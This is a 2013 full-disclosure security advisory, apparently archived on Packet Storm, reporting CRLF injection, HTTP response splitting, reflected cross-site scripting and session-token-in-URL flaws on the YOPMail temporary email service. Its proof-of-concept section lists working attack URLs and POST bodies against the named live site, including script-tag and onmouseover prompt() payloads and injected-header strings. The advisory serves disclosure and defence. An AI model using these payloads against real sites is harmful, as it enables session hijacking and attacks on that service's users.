what you don't know can hurt you

YOPMail XSS / Injection / HTTP Response Splitting

YOPMail XSS / Injection / HTTP Response Splitting
Posted Jun 28, 2013
Authored by Juan Carlos Garcia

YOPMail suffers from cross site scripting, HTTP response splitting, CRLF injection, and session token handling vulnerabilities.

tags | exploit, web, vulnerability, xss
MD5 | a5d9881d634167e06e2db886f4cca8b3

YOPMail XSS / Injection / HTTP Response Splitting

Change Mirror Download
YOPMAIL(Anonymous&Free email address) CRLF Injection-HTTP Response Spliting/XSS/Session Token in URL
==================================================================================================================================================


Report-Timeline:
================
2013-06-01: Researcher Notification
2013-06-03: RESPONSE
2013-06-07: Ask About the issues
2013-06-10: Vendor Feedback
2013-06-13: Not Fixed
2013-06-16: Ask About the Issues
2013-06-27: Not Fixed / Not Response
2013-06-28: Full Disclosure


I-VULNERABILITIES
======================

#Title: YOPMAIL(Anonymous&Free email address) YopMail CRLFInjection-HTTP Response Spliting / XSS/ Session Token in URL /

#Vendor:http://www.yopmail.com

#Author:Juan Carlos García (@secnight)

#Follow me
http://www.highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight


II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. They keep a message up for 8 days.
It's possibble to send a message to another YOPmail address mail. No registration required. Firefox, Internet Explorer 7 and Opera add-ons are

downloadable. There are alternate domains.

Domains

@yopmail.fr
@yopmail.net
@cool.fr.nf
@jetable.fr.nf
@nospam.ze.tc
@nomail.xl.cx
@mega.zik.dj
@speed.1s.fr
@courriel.fr.nf
@moncourrier.fr.nf
@monemail.fr.nf
@monmail.fr.nf
@mail.mezimages.net
The site has new domains every three months.


III-PROOF OF CONCEPT
======================

CRLF INJECTION-HTTP RESPONSE SPLITING
______________________________________

The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers

are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user

defacement, positioning of client's web-cache, hijacking of web pages, defacement and a myriad of other related attacks

Attacks
-------

http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717


Multiple CROSS SITE SCRIPTING
_______________________________

The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a

manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.

Attacks
--------

Below I expose a few vulnerabilities because many failures of this type in this web service... So much XSS..

Affected items
/add-domain.php
/alternate-domains.php
/alternate-email-address.php
/conditions.php
/contact.php
/definitions/email-jetable.php
/definitions/mail-anonyme.php
/definitions/spam.php
/donation.php
/email-anonyme.php
/email-generator.php
/en
/en/add-domain.php
/en/alternate-domains.php
/en/alternate-email-address.php
/en/conditions.php
/en/contact.php
/en/definitions
/en/definitions/email-jetable.php
/en/definitions/mail-anonyme.php
/en/definitions/spam.php
/en/donation.php
/en/email-anonyme.php
/en/email-generator.php
/en/faq.php
/en/images
/en/index.php
/en/plugins.php
/en/privacy.php
/en/send-mail.php
/en/style
/en/style/pic
/en/yopmail-chat.php
/es
/es/add-domain.php
/es/alternate-domains.php
/es/alternate-email-address.php
/es/conditions.php
/es/contact.php
/es/definitions
/es/definitions/email-jetable.php
/es/definitions/mail-anonyme.php
/es/definitions/spam.php
/es/donation.php
/es/email-anonyme.php
/es/email-generator.php
/es/faq.php
/es/images
/es/index.php
/es/plugins.php
/es/privacy.php
/es/send-mail.php
/es/style
/es/style/pic
/es/yopmail-chat.php
/faq.php
/fr
/fr/add-domain.php
/fr/alternate-domains.php
/fr/alternate-email-address.php
/fr/conditions.php
/fr/contact.php
/fr/definitions
/fr/definitions/email-jetable.php
/fr/definitions/mail-anonyme.php
/fr/definitions/spam.php
/fr/donation.php
/fr/email-anonyme.php
/fr/email-generator.php
/fr/faq.php
/fr/images
/fr/index.php
/fr/plugins.php
/fr/privacy.php
/fr/send-mail.php
/fr/style
/fr/style/pic
/fr/yopmail-chat.php
/index.php
/it
/it/add-domain.php
/it/alternate-domains.php
/it/alternate-email-address.php
/it/conditions.php
/it/contact.php
/it/definitions
/it/definitions/email-jetable.php
/it/definitions/mail-anonyme.php
/it/definitions/spam.php
/it/donation.php
/it/email-anonyme.php
/it/email-generator.php
/it/faq.php
/it/images
/it/index.php
/it/plugins.php
/it/privacy.php
/it/send-mail.php
/it/style
/it/style/pic
/it/yopmail-chat.php
/pl
/pl/add-domain.php
/pl/alternate-domains.php
/pl/alternate-email-address.php
/pl/conditions.php
/pl/contact.php
/pl/definitions
/pl/definitions/email-jetable.php
/pl/definitions/mail-anonyme.php
/pl/definitions/spam.php
/pl/donation.php
/pl/email-anonyme.php
/pl/email-generator.php
/pl/faq.php
/pl/images
/pl/index.php
/pl/plugins.php
/pl/privacy.php
/pl/send-mail.php
/pl/style
/pl/style/pic
/pl/yopmail-chat.php
/plugins.php
/privacy.php
/ru
/ru/add-domain.php
/ru/alternate-domains.php
/ru/alternate-email-address.php
/ru/conditions.php
/ru/contact.php
/ru/definitions
/ru/definitions/email-jetable.php
/ru/definitions/mail-anonyme.php
/ru/definitions/spam.php
/ru/donation.php
/ru/email-anonyme.php
/ru/email-generator.php
/ru/faq.php
/ru/images
/ru/index.php
/ru/plugins.php
/ru/privacy.php
/ru/send-mail.php
/ru/style
/ru/style/pic
/ru/yopmail-chat.php
/send-mail.php
/uk
/uk/add-domain.php
/uk/alternate-domains.php
/uk/alternate-email-address.php
/uk/conditions.php
/uk/contact.php
/uk/definitions
/uk/definitions/email-jetable.php
/uk/definitions/mail-anonyme.php
/uk/definitions/spam.php
/uk/donation.php
/uk/email-anonyme.php
/uk/email-generator.php
/uk/faq.php
/uk/images
/uk/index.php
/uk/plugins.php
/uk/privacy.php
/uk/send-mail.php
/uk/style
/uk/style/pic
/uk/yopmail-chat.php
/yopmail-chat.php
/zh
/zh/add-domain.php
/zh/alternate-domains.php
/zh/alternate-email-address.php
/zh/conditions.php
/zh/contact.php
/zh/definitions
/zh/definitions/email-jetable.php
/zh/definitions/mail-anonyme.php
/zh/definitions/spam.php
/zh/donation.php
/zh/email-anonyme.php
/zh/email-generator.php
/zh/faq.php
/zh/images
/zh/index.php
/zh/plugins.php
/zh/privacy.php
/zh/send-mail.php
/zh/style
/zh/style/pic
/zh/yopmail-chat.php

Method GET
----------

http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec

http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec

http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid

http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E

http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E

http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E

http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E

http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E

http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E

Method POST
------------

http://www.yopmail.com:80/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-

1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-

dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-

7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt

%28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-

0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


SESSION TOKEN IN URL
____________________

This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL.

URLs could be logged or leaked via the Referer header.

Affected items
--------------

/cr.php (78a3a31e275b316f36665b35eb4bfe21)
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1)
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3)
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca)
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)

Examples

Method GET
----------

http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&

http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Method POST
-----------

/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-

1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-

1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst



IV. CREDITS
-------------------------

This vulnerabilities has been discovered
by Juan Carlos García(@secnight)


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    14 Files
  • 20
    Sep 20th
    17 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close